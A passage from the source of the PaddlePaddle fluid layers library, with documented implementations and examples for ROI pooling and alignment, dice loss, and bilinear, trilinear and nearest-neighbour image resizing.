rois (Variable): ROIs (Regions of Interest) to pool over. 2D-LoDTensor with the shape of [num_rois,4], the lod level is 1. Given as [[x1, y1, x2, y2], ...], (x1, y1) is the top left coordinates, and (x2, y2) is the bottom right coordinates.
rois_lod (Variable): The lod info of rois. Default: None
pooled_height (int, optional): The pooled output height, data type is int32. Default: 1
pooled_width (int, optional): The pooled output width, data type is int32. Default: 1
spatial_scale (float, optional): Multiplicative spatial scale factor to translate ROI coords from their input scale to the scale used when pooling. Default: 1.0
Returns:
Variable: The pooled feature, 4D-Tensor with the shape of [num_rois, C, pooled_height, pooled_width].
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
DATATYPE='float32'
place = fluid.CPUPlace()
#place = fluid.CUDAPlace(0)
input_data = np.array([i for i in range(1,17)]).reshape(1,1,4,4).astype(DATATYPE)
roi_data =fluid.create_lod_tensor(np.array([[1., 1., 2., 2.], [1.5, 1.5, 3., 3.]]).astype(DATATYPE),[[2]], place)
rois_lod_data = np.array([0, 2])
x = fluid.data(name='input', shape=[None,1,4,4], dtype=DATATYPE)
rois = fluid.data(name='roi', shape=[None,4], dtype=DATATYPE)
rois_lod = fluid.data(name='rois_lod', shape=[None], dtype='int64')
pool_out = fluid.layers.roi_pool(
input=x,
rois=rois,
pooled_height=1,
pooled_width=1,
spatial_scale=1.0,
rois_lod=rois_lod)
exe = fluid.Executor(place)
out, = exe.run(feed={'input':input_data ,'roi':roi_data, 'rois_lod': rois_lod_data}, fetch_list=[pool_out.name])
print(out) #array([[[[11.]]], [[[16.]]]], dtype=float32)
print(np.array(out).shape) # (2, 1, 1, 1)
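The printed values can be reproduced by hand with a simplified numpy sketch of the three steps (hedged: a single 1x1 section per ROI, spatial_scale=1.0, and simple coordinate rounding are assumed; edge clamping and bin subdivision are omitted):
.. code-block:: python
    import numpy as np
    feat = np.arange(1, 17).reshape(4, 4).astype('float32')
    rois = [[1., 1., 2., 2.], [1.5, 1.5, 3., 3.]]
    outs = []
    for x1, y1, x2, y2 in rois:
        # step 1: map the ROI onto the feature map (one section, since the pooled size is 1x1)
        c0, r0, c1, r1 = [int(round(v)) for v in (x1, y1, x2, y2)]
        # steps 2 and 3: take the largest value in the section and copy it to the output
        outs.append(feat[r0:r1 + 1, c0:c1 + 1].max())
    # outs == [11.0, 16.0], matching the roi_pool output above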
"""
helper = LayerHelper('roi_pool', **locals())
dtype = helper.input_dtype()
pool_out = helper.create_variable_for_type_inference(dtype)
argmaxes = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type="roi_pool",
inputs={"X": input,
"ROIs": rois,
"RoisLod": rois_lod},
outputs={"Out": pool_out,
"Argmax": argmaxes},
attrs={
"pooled_height": pooled_height,
"pooled_width": pooled_width,
"spatial_scale": spatial_scale
})
return pool_out
@templatedoc()
def roi_align(input,
rois,
pooled_height=1,
pooled_width=1,
spatial_scale=1.0,
sampling_ratio=-1,
name=None,
rois_lod=None):
"""
${comment}
Args:
input (Variable): ${x_comment}
rois (Variable): ROIs (Regions of Interest) to pool over. It should be
a 2-D LoDTensor of shape (num_rois, 4), the lod level is 1. The
data type is float32 or float64. Given as [[x1, y1, x2, y2], ...],
(x1, y1) is the top left coordinates, and (x2, y2) is the bottom
right coordinates.
rois_lod (Variable): The lod info of rois. Default: None
pooled_height (int32, optional): ${pooled_height_comment} Default: 1
pooled_width (int32, optional): ${pooled_width_comment} Default: 1
spatial_scale (float32, optional): ${spatial_scale_comment} Default: 1.0
sampling_ratio(int32, optional): ${sampling_ratio_comment} Default: -1
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable:
Output: ${out_comment}.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(
name='data', shape=[None, 256, 32, 32], dtype='float32')
rois = fluid.data(
name='rois', shape=[None, 4], dtype='float32')
rois_lod = fluid.data(name='rois_lod', shape=[None], dtype='int64')
align_out = fluid.layers.roi_align(input=x,
rois=rois,
pooled_height=7,
pooled_width=7,
spatial_scale=0.5,
sampling_ratio=-1,
rois_lod=rois_lod)
"""
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'roi_align')
check_variable_and_dtype(rois, 'rois', ['float32', 'float64'], 'roi_align')
helper = LayerHelper('roi_align', **locals())
dtype = helper.input_dtype()
align_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="roi_align",
inputs={"X": input,
"ROIs": rois,
"RoisLod": rois_lod},
outputs={"Out": align_out},
attrs={
"pooled_height": pooled_height,
"pooled_width": pooled_width,
"spatial_scale": spatial_scale,
"sampling_ratio": sampling_ratio
})
return align_out
def dice_loss(input, label, epsilon=0.00001, name=None):
"""
Dice loss for comparing the similarity between the input predictions and the label.
This implementation is for binary classification, where the input is sigmoid
predictions of each pixel, usually used for segmentation task. The dice loss can
be defined as the following equation:
.. math::
dice\_loss &= 1 - \\frac{2 * intersection\_area}{total\_area} \\\\
&= \\frac{(total\_area - intersection\_area) - intersection\_area}{total\_area} \\\\
&= \\frac{(union\_area - intersection\_area)}{total\_area}
Parameters:
input (Variable): Tensor, rank>=2, shape is :math:`[N_1, N_2, ..., N_D]`, where :math:`N_1` is
the batch_size, :math:`N_D` is 1. It is usually the output predictions of sigmoid activation.
The data type can be float32 or float64.
label (Variable): Tensor, the ground truth with the same rank as input, shape is :math:`[N_1, N_2, ..., N_D]`.
where :math:`N_1` is the batch_size, :math:`N_D` is 1. The data type can be float32 or float64.
epsilon (float): The epsilon will be added to the numerator and denominator.
If both input and label are empty, it makes sure dice is 1.
Default: 0.00001
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The dice loss with shape [1], data type is the same as `input` .
Return Type:
Variable
Example:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='data', shape = [3, 224, 224, 1], dtype='float32')
label = fluid.data(name='label', shape=[3, 224, 224, 1], dtype='float32')
predictions = fluid.layers.sigmoid(x)
loss = fluid.layers.dice_loss(input=predictions, label=label)
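The equation above can be sanity-checked on a toy binary mask with numpy (a hedged sketch of the formula only, reducing over all but the batch dimension as the layer does):
.. code-block:: python
    import numpy as np
    eps = 0.00001
    pred  = np.array([[0.9, 0.8, 0.1, 0.2]])    # sigmoid outputs, batch of one
    label = np.array([[1.0, 1.0, 0.0, 0.0]])
    inter = (pred * label).sum(axis=1)
    total = pred.sum(axis=1) + label.sum(axis=1)
    loss = (1 - 2 * inter / (total + eps)).mean()
    # loss ~= 0.15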
"""
label = one_hot(label, depth=input.shape[-1])
reduce_dim = list(range(1, len(input.shape)))
inse = reduce_sum(input * label, dim=reduce_dim)
dice_denominator = reduce_sum(
input, dim=reduce_dim) + reduce_sum(
label, dim=reduce_dim)
dice_score = 1 - inse * 2 / (dice_denominator + epsilon)
return reduce_mean(dice_score)
def image_resize(input,
out_shape=None,
scale=None,
name=None,
resample='BILINEAR',
actual_shape=None,
align_corners=True,
align_mode=1,
data_format='NCHW'):
"""
This op resizes a batch of images.
The input must be a 4-D Tensor of the shape (num_batches, channels, in_h, in_w)
or (num_batches, in_h, in_w, channels), or a 5-D Tensor of the shape
(num_batches, channels, in_d, in_h, in_w) or (num_batches, in_d, in_h, in_w, channels),
and the resizing only applies on the three dimensions(depth, height and width).
**Warning:** the parameter :attr:`actual_shape` will be deprecated in the
future; please use :attr:`out_shape` instead.
Supporting resample methods:
'BILINEAR' : Bilinear interpolation
'TRILINEAR' : Trilinear interpolation
'NEAREST' : Nearest neighbor interpolation
Nearest neighbor interpolation is to perform nearest neighbor interpolation
in both the 3rd dimension (the height direction) and the 4th dimension (the width
direction) of the input tensor.
Bilinear interpolation is an extension of linear interpolation for
interpolating functions of two variables (e.g. H-direction and
W-direction in this op) on a rectilinear 2D grid. The key idea is
to perform linear interpolation first in one direction, and then
again in the other direction.
Trilinear interpolation is an extension of linear interpolation for
interpolating functions of three variables (e.g. D-direction,
H-direction and W-direction in this op) on a rectilinear 3D grid.
The linear interpolation is performed on three directions.
Align_corners and align_mode are optional parameters; the interpolation
calculation method can be selected by them.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Nearest neighbor interpolation:
if:
align_corners = False
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = floor (H_{in} * scale_{factor})
W_out = floor (W_{in} * scale_{factor})
else:
align_corners = True
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = round(H_{in} * scale_{factor})
W_out = round(W_{in} * scale_{factor})
Bilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
Trilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = (D_{in}+0.5) * scale_{factor} - 0.5
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = D_{in} * scale_{factor}
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
For details of nearest neighbor interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Nearest-neighbor_interpolation.
For details of bilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Bilinear_interpolation.
For details of trilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Trilinear_interpolation.
Parameters:
input (Variable): 4-D or 5-D Tensor, its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): Output shape of image resize
layer, the shape is (out_h, out_w) when input is a 4-D Tensor and is
(out_d, out_h, out_w) when input is a 5-D Tensor. Default: None. If
a list, each element can be an integer or a Tensor Variable of shape: [1].
If a Tensor Variable, its dimensions size should be a 1.
scale(float|Variable|None): The multiplier for the input height or width. At
least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
name(str|None): A name for this layer (optional). If set to None, the layer
will be named automatically.
resample(str): The resample method. It supports 'BILINEAR', 'TRILINEAR'
and 'NEAREST' currently. Default: 'BILINEAR'
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors will occur in the graph constructing stage.
Default: None
align_corners(bool) : An optional bool, If True, the centers of the 4 corner pixels of the
input and output tensors are aligned, preserving the values at the
corner pixels.
Default: True
align_mode(int) : An optional input for bilinear interpolation. It can be \'0\'
for src_idx = scale*(dst_index+0.5)-0.5, or \'1\' for
src_idx = scale*dst_index.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`, `"NCDHW"`,
`"NDHWC"`. The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`. When it is `"NCDHW"`, the data is stored
in the order of: `[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
A 4-D Tensor of the shape (num_batches, channels, out_h, out_w) or (num_batches, out_h, out_w, channels),
or 5-D Tensor of the shape (num_batches, channels, out_d, out_h, out_w) or (num_batches, out_d, out_h, out_w, channels).
Raises:
TypeError: out_shape should be a list or tuple or Variable.
TypeError: actual_shape should either be Variable or None.
ValueError: The 'resample' of image_resize can only be 'BILINEAR',
'TRILINEAR' or 'NEAREST' currently.
ValueError: 'BILINEAR' and 'NEAREST' only support 4-D tensor.
ValueError: 'TRILINEAR' only support 5-D tensor.
ValueError: One of out_shape and scale must not be None.
ValueError: out_shape length should be 2 for input 4-D tensor.
ValueError: out_shape length should be 3 for input 5-D tensor.
ValueError: scale should be greater than zero.
TypeError: align_corners should be a bool value
ValueError: align_mode can only be '0' or '1'
ValueError: data_format can only be 'NCHW', 'NHWC', 'NCDHW' or 'NDHWC'.
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,10])
#1
output = fluid.layers.image_resize(input=input,out_shape=[12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.image_resize(input=input,out_shape=[12,dim1])
#3
#x = np.array([3,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[2], dtype="int32")
#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.image_resize(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.image_resize(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12)
#2
# (2, 3, 12, 2)
#3
# (2, 3, 3, 12)
#4
# (2, 3, 3, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.image_resize(input=input, out_shape=[12,12])
print(output.shape)
# [2L, 3L, 12L, 12L]
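The "For scale" rules listed earlier can be verified with a short arithmetic sketch (hedged; an input height of 6 resized to 12 is an assumption for illustration):
.. code-block:: python
    in_size, out_size = 6, 12
    scale_aligned = (in_size - 1.0) / (out_size - 1.0)   # align_corners = True: 5/11 ~= 0.4545
    scale_plain = float(in_size) / out_size              # align_corners = False: 0.5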
"""
resample_methods = {
'BILINEAR': 'bilinear',
'TRILINEAR': 'trilinear',
'NEAREST': 'nearest',
}
if resample not in resample_methods:
raise ValueError(
"The 'resample' of image_resize can only be 'BILINEAR', 'TRILINEAR' "
"or 'NEAREST' currently.")
resample_type = resample_methods[resample]
if resample in ['BILINEAR', 'NEAREST'] and len(input.shape) != 4:
raise ValueError("'BILINEAR' and 'NEAREST' only support 4-D tensor.")
if resample == 'TRILINEAR' and len(input.shape) != 5:
raise ValueError("'TRILINEAR'only support 5-D tensor.")
if not isinstance(align_corners, bool):
raise TypeError("Attr align_corners should be a bool value")
if align_mode != 0 and align_mode != 1:
raise ValueError("align_mode can only be 0 or 1")
if out_shape is None and scale is None:
raise ValueError("One of out_shape and scale must not be None.")
helper = LayerHelper('{}_interp'.format(resample_type), **locals())
dtype = helper.input_dtype()
if len(input.shape) == 4 and data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Got wrong value for param `data_format`: " + data_format +
" received but only `NCHW` or `NHWC` supported for 4-D input.")
elif len(input.shape) == 5 and data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Got wrong value for param `data_format`: " + data_format +
" received but only `NCDHW` or `NDHWC` supported for 5-D input.")
def _is_list_or_turple_(data):
return (isinstance(data, list) or isinstance(data, tuple))
if data_format == 'NCHW' or data_format == 'NCDHW':
data_layout = 'NCHW'
if data_format == 'NHWC' or data_format == 'NDHWC':
data_layout = 'NHWC'
inputs = {"X": input}
attrs = {
"out_d": -1,
"out_h": -1,
"out_w": -1,
"interp_method": resample_type,
"align_corners": align_corners,
"align_mode": align_mode,
"data_layout": data_layout
}
if out_shape is not None:
if isinstance(out_shape, Variable):
out_shape.stop_gradient = True
inputs['OutSize'] = out_shape
else:
if not (_is_list_or_turple_(out_shape)):
raise TypeError(
"out_shape should be a list or tuple or Variable.")
# Validate the shape
contain_var = False
for dim_idx, dim_size in enumerate(out_shape):
if isinstance(dim_size, Variable):
contain_var = True
continue
assert dim_size > 0, (
"Each dimension size given in out_shape must be greater than 0."
)
if contain_var:
new_size_tensor = []
size_list = []
for dim in out_shape:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_size_tensor.append(dim)
size_list.append(-1)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference(
'int32')
fill_constant(
[1], 'int32', dim, force_cpu=True, out=temp_out)
new_size_tensor.append(temp_out)
size_list.append(dim)
inputs['SizeTensor'] = new_size_tensor
if len(input.shape) == 4:
if len(out_shape) != 2:
raise ValueError("out_shape length should be 2 for "
"input 4-D tensor.")
if contain_var:
attrs['out_h'] = size_list[0]
attrs['out_w'] = size_list[1]
else:
out_shape = list(map(int, out_shape))
attrs['out_h'] = out_shape[0]
attrs['out_w'] = out_shape[1]
if len(input.shape) == 5:
if len(out_shape) != 3:
raise ValueError("out_shape length should be 3 for "
"input 5-D tensor.")
if contain_var:
attrs['out_d'] = size_list[0]
attrs['out_h'] = size_list[1]
attrs['out_w'] = size_list[2]
else:
out_shape = list(map(int, out_shape))
attrs['out_d'] = out_shape[0]
attrs['out_h'] = out_shape[1]
attrs['out_w'] = out_shape[2]
else:
if isinstance(scale, Variable):
scale.stop_gradient = True
inputs["Scale"] = scale
elif isinstance(scale, float) or isinstance(scale, int):
if scale <= 0:
raise ValueError("Attr(scale) should be greater than zero.")
attrs['scale'] = float(scale)
else:
raise TypeError(
"Attr(scale)'s type should be float, int or Variable.")
if isinstance(actual_shape, Variable):
warnings.warn(
"actual_shape will be deprecated, it is recommended to use "
"out_shape instead of actual_shape to specify output shape dynamically."
)
actual_shape.stop_gradient = True
inputs["OutSize"] = actual_shape
elif actual_shape is not None:
raise TypeError("actual_shape should either be Variable or None.")
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='{}_interp'.format(resample_type),
inputs=inputs,
outputs={"Out": out},
attrs=attrs)
return out
@templatedoc(op_type="bilinear_interp")
def resize_bilinear(input,
out_shape=None,
scale=None,
name=None,
actual_shape=None,
align_corners=True,
align_mode=1,
data_format='NCHW'):
"""
This op resizes the input by performing bilinear interpolation based on given
output shape which specified by actual_shape, out_shape and scale
in priority order.
**Warning:** the parameter :attr:`actual_shape` will be deprecated in
the future; please use :attr:`out_shape` instead.
Bilinear interpolation is an extension of linear interpolation for
interpolating functions of two variables (e.g. H-direction and
W-direction in this op) on a rectilinear 2D grid. The key idea is
to perform linear interpolation first in one direction, and then
again in the other direction.
For details of bilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Bilinear_interpolation
Align_corners and align_mode are optional parameters; the interpolation
calculation method can be selected by them.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Bilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
Parameters:
input(Variable): 4-D Tensor(NCHW), its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): Output shape of resize bilinear
layer, the shape is (out_h, out_w). Default: None. If a list, each
element can be an integer or a Tensor Variable with shape: [1]. If a
Tensor Variable, its dimension size should be 1.
scale(float|Variable|None): The multiplier for the input height or width. At
least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors will occur in the graph constructing stage.
Default: None
align_corners(bool): ${align_corners_comment}
align_mode(int): ${align_mode_comment}
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: 4-D tensor(NCHW or NHWC).
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,10])
#1
output = fluid.layers.resize_bilinear(input=input,out_shape=[12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.resize_bilinear(input=input,out_shape=[12,dim1])
#3
#x = np.array([3,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[2], dtype="int32")
#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.resize_bilinear(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.resize_bilinear(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12)
#2
# (2, 3, 12, 2)
#3
# (2, 3, 3, 12)
#4
# (2, 3, 3, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.resize_bilinear(input=input, out_shape=[12,12])
print(output.shape)
# [2L, 3L, 12L, 12L]
"""
return image_resize(input, out_shape, scale, name, 'BILINEAR', actual_shape,
align_corners, align_mode, data_format)
@templatedoc(op_type="trilinear_interp")
def resize_trilinear(input,
out_shape=None,
scale=None,
name=None,
actual_shape=None,
align_corners=True,
align_mode=1,
data_format='NCDHW'):
"""
This op resizes the input by performing trilinear interpolation based on given
output shape which specified by actual_shape, out_shape and scale
in priority order.
**Warning:** the parameter :attr:`actual_shape` will be deprecated
in the future; please use :attr:`out_shape` instead.
Trilinear interpolation is an extension of linear interpolation for
interpolating functions of three variables (e.g. D-direction,
H-direction and W-direction in this op) on a rectilinear 3D grid.
The linear interpolation is performed on three directions.
For details of trilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Trilinear_interpolation
Align_corners and align_mode are optional parameters; the interpolation
calculation method can be selected by them.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Trilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = (D_{in}+0.5) * scale_{factor} - 0.5
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = D_{in} * scale_{factor}
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
Parameters:
input(${x_type}): 5-D Tensor, its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): The output shape of resized tensor, the shape is (out_d, out_h, out_w). Default: None. Every element should be an integer or a Tensor Variable with shape: [1] if it is a list. If it is a Tensor Variable, its dimension size should be 1.
scale(float|Variable|None): The multiplier for the input depth, height or width.
At least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors will occur in the graph constructing stage.
Default: None
align_corners(bool): ${align_corners_comment}
align_mode(int): ${align_mode_comment}
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
Variable: A 5-D Tensor(NCDHW or NDHWC)
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,8,10])
#1
output = fluid.layers.resize_trilinear(input=input,out_shape=[12,12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.resize_trilinear(input=input,out_shape=[12,dim1,4])
#3
#x = np.array([3,12,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[3], dtype="int32")
#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.resize_trilinear(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.resize_trilinear(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,8,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12, 12)
#2
# (2, 3, 12, 2, 4)
#3
# (2, 3, 3, 12, 12)
#4
# (2, 3, 3, 4, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.resize_trilinear(input=input, out_shape=[12,12,12])
print(output.shape)
# [2L, 3L, 12L, 12L, 12L]
"""
return image_resize(input, out_shape, scale, name, 'TRILINEAR',
actual_shape, align_corners, align_mode, data_format)
@templatedoc(op_type="nearest_interp")
def resize_nearest(input,
out_shape=None,
scale=None,
name=None,
actual_shape=None,
align_corners=True,
data_format='NCHW'):
"""
This op resizes the input by performing nearest neighbor interpolation in both the
height direction and the width direction based on given output shape
which is specified by actual_shape, out_shape and scale in priority order.
**Warning:** the parameter :attr:`actual_shape` will be deprecated in the
future; please use :attr:`out_shape` instead.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Nearest neighbor interpolation:
if:
align_corners = False
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = floor(H_{in} * scale_{factor})
W_out = floor(W_{in} * scale_{factor})
else:
align_corners = True
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = round(H_{in} * scale_{factor})
W_out = round(W_{in} * scale_{factor})
For details of nearest neighbor interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Nearest-neighbor_interpolation
Parameters:
input(${x_type}): 4-D Tensor, its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): The output shape of resized tensor, the shape is (out_h, out_w). Default: None. Every element should be an integer or a tensor Variable with shape: [1] if it is a list. If it is a tensor Variable, its dimension size should be 1.
scale(float|Variable|None): The multiplier for the input height or width. At
least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors will occur in the graph constructing stage.
Default: None
align_corners(bool): ${align_corners_comment}
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
Variable: 4-D tensor(NCHW or NHWC).
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,10])
#1
output = fluid.layers.resize_nearest(input=input,out_shape=[12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.resize_nearest(input=input,out_shape=[12,dim1])
#3
#x = np.array([3,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[2], dtype="int32")
